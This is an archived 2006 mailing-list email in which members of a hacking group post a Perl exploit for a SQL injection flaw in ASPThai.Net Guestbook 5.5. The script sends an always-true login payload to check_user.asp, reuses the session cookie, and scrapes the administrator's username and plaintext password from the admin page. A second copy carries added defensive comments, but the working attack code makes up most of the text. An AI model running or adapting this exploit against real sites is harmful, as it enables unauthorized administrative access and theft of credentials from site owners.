------=_Part_9669_22649246.1139201383091 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline I MurderSkillz from g00ns.net found a vuln "SQL Injection Exploit for ASPThai.Net Guestbook <=3D 5.5 and POSSIBLY higher" The sql injection takes place in admin.asp. IF injected with special characters into the login it will grant u with admin..BUT we wrote wrote some code to grab plaintext use= r and pass..here is the code #!/usr/bin/perl # SQL Injection Exploit for ASPThai.Net Guestbook <=3D 5.5 #(And possible higher could not find a site to test it on) # This exploit shows the username of the administrator and the password In plain text # Bug Found by muderskillz Coded by Zodiac # Shouts to cijfer,uid0,|n|ex,ph4tel,z3r0,lethal, Felosi,seven,Spic and anyone else I forgot. # http://exploitercode.com/ http://www.g00ns.net #irc.g00ns.net #g00ns email =3D zodiac@g00ns.net #(c) 2006 use LWP::UserAgent; use HTTP::Cookies; $Server =3D $ARGV[0]; if($Server =3D~m/http/g) { $Server=3D~ 'http://$Server'; print } else { print $error; } if(!$Server) {usage();exit() ;} head(); print "\r\nGrabbing Username And Password\r\n\n"; #Login's and stores a cookie to view admin panel later $xpl =3D LWP::UserAgent->new() or die; $cookie_jar =3D HTTP::Cookies->new(); $xpl->agent('g00ns'); $xpl->cookie_jar($cookie_jar); $res =3D $xpl->post( $Server.'check_user.asp', Content =3D> [ 'txtUserName' =3D> '\' or \'%67%30%30%6e%73\'=3D\'%67%30%30%6e%73', 'txtUserPass' =3D> '\' or \'%67%30%30%6e%73\'=3D\'%67%30%30%6e%73', 'Submit' =3D> '-=3D Login =3D-', ], ); # Create a request my $req =3D HTTP::Request->new(GET =3D> $Server.'change_admin_username.asp' ); $req->header('Referer', $Server.'admin_menu.asp'); my $res =3D $xpl->request($req); $info=3D $res->content; if($info =3D~ m/Unauthorised\sAccess|The\spage\scannot\sbe\sfound/) { die "Error Connecting...\r\n"; } #Check the outcome of the response $info=3D~m/(value=3D\")(\n+|\w+|\W+)/g; $User 
=3D $2; $info=3D~m/(value=3D\")(\n+|\w+|\W+)/g; $Pass=3D $2; print "UserName:$User\r\nPassword:$Pass\r\n"; sub head() { print "\n=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n"; print "* ASPThai.Net Guestbook version 5.5 SQL Injection by www.g00ns.net*\r\n"; print "=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n"; } sub usage() { head(); print " Usage: Thaisql.pl \r\n\n"; print " - Full path to Guestbook e.g. http://www.site.com/guestbook/\r\n"; print "=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n"; print " -=3DCoded by Zodiac, Bug Found by MurderSkillz=3D-\r\n"; print "www.exploitercode.com www.g00ns.net irc.g00ns.net #g00ns\r\n"; print "=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n"; exit(); } its been out for like 2 days now.. ------=_Part_9669_22649246.1139201383091 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline
I, MurderSkillz from g00ns.net, found a vuln: "SQL Injection Exploit for ASPThai.Net Guestbook <= 5.5 and POSSIBLY higher". The SQL injection takes place in admin.asp. If special characters are injected into the login, it will grant you admin.. BUT we wrote some code to grab the plaintext user and pass.. here is the code:
 

#!/usr/bin/perl
# SQL Injection Exploit for ASPThai.Net Guestbook <= 5.5
# (and possibly higher; could not find a site to test it on)
# This exploit shows the username of the administrator and the password in plain text
# Bug found by muderskillz, coded by Zodiac
# Shouts to cijfer,uid0,|n|ex,ph4tel,z3r0,lethal, Felosi,seven,Spic and anyone else I forgot.
# http://exploitercode.com/ http://www.g00ns.net
#irc.g00ns.net #g00ns  email = zodiac@g00ns.net
#(c) 2006

use LWP::UserAgent;
use HTTP::Cookies;


# Target handling. NOTE(review): `=3D` throughout this listing is the mail
# archive's quoted-printable encoding of `=`; the code is shown as archived.
# The guestbook base URL is taken from the first command-line argument.
$Server =3D $ARGV[0];

# NOTE(review): the statement inside this branch is a pattern match against a
# single-quoted literal, not an assignment, so $Server is left unchanged; the
# `print` that follows is truncated in the archive.
if($Server =3D~m/http/g)
{
$Server=3D~ 'http://$Server';
print =
}

else {
  # $error is never assigned in the visible code, so this prints an empty value.
  print $error;
}

 


# With no argument, show the usage text and stop.
if(!$Server) {usage();exit() ;}

head();

 

print "\r\nGrabbing Username And Password\r\n\n";

 

# Logs in to the guestbook and keeps the session cookie for the admin request
# that follows. Defender view: both login fields carry a single quote followed
# by an always-true `or` comparison (the %xx sequences are the same literal on
# both sides), so the login only succeeds if check_user.asp builds its SQL by
# pasting the form values into the query text -- presumably the case here;
# confirm against the ASP source. The fix is on the server side: bind
# txtUserName/txtUserPass as query parameters instead of concatenating them.
# Log/WAF indicators visible in this request: User-Agent `g00ns`, and a quote
# plus `or` in the login fields of a POST to check_user.asp.


 $xpl =3D LWP::UserAgent->new() or die;
 $cookie_jar= =3D HTTP::Cookies->new();

 $xpl->agent('g00ns');
 $xpl->cookie_jar($cookie_jar)= ;

 $res =3D $xpl->post(
 $Server.'check_user.asp',
&nbs= p;Content =3D> [


 'txtUserName' =3D> '\' or \'%67%30%30%6e%73\'=3D\'%67%30%30= %6e%73',
 'txtUserPass' =3D> '\' or \'%67%30%30%6e%73\'=3D\'%67= %30%30%6e%73',
 'Submit' =3D> '-=3D Login =3D-',
 ],
=  );

 

# Fetches change_admin_username.asp through the same user agent ($xpl), whose
# cookie jar holds whatever session cookie the login POST returned.
my $req =3D HTTP::Request->new(GET =3D>

$Server.'change_admin_username.asp'

);

# The Referer is set to the admin menu page -- presumably because the target
# page checks it (TODO confirm). Defender note: Referer is supplied by the
# client, so it cannot serve as an access check; the page should rely on the
# authenticated server-side session only.
$req->header('Referer', $Server.'admin_menu.asp');

 

my $res =3D $xpl->request($req);

$info=3D $res->content;

# Stop if the body contains either of these error strings (access refused or
# page missing); any other body is passed on to the extraction step.
if($info =3D~ m/Unauthorised\sAccess|The\spage\scannot\sbe\sfound/)
= {
 die "Error Connecting...\r\n";
}

 


# Pulls two values out of the returned HTML: each /g match resumes where the
# previous one stopped, so $User is the text after the first `value="` and
# $Pass the text after the second. NOTE(review): group 2 is an alternation of
# \n+, \w+ and \W+, so it captures a single run of one character class, not
# necessarily the whole attribute value.
# Defender note: the script header says the password comes back in plain text,
# which means the admin form echoes stored credentials into the page. Storing
# only a salted hash and never rendering the password removes this exposure
# even when a login bypass exists.

 

$info=3D~m/(value=3D\")(\n+|\w+|\W+)/g;
$User =3D $2;
$info= =3D~m/(value=3D\")(\n+|\w+|\W+)/g;
$Pass=3D $2;


print "UserName:$User\r\nPassword:$Pass\r\n";

 

# Prints the three-line banner: a rule of `=` characters (quoted-printable
# encoded as `=3D` in this archive), the title line, and a second rule.
# NOTE(review): declared with an empty prototype but called earlier in the
# file, before this definition, so the prototype is not applied to that call.
sub head()
 {
 print "\n=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n";
 print "* ASPT= hai.Net Guestbook version 5.5 SQL Injection by www.g00ns.net *\r\n";  
 print "=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n";
 = }
# Prints the banner followed by the usage text and credits, then exits the
# process; the caller's own exit() after usage() is therefore never reached.
# The only argument the usage text describes is the guestbook's base URL.
sub usage()
 {
 head();
 print " Usage: T= haisql.pl <Site>  \r\n\n";
 print " <Site> - Full path to Guestbook e.g. http://www.site.com/guestbook/ \r\n= ";
 print "=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D\r\n";
 print "   -=3DCoded by Zodiac, Bug Found by Murder= Skillz=3D-\r\n";
 print "www.exploitercode.com www.g= 00ns.net irc.g00ns.net #g00ns\r\n";
 print "=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n";
 exit(); }

 

It's been out for like 2 days now..
 
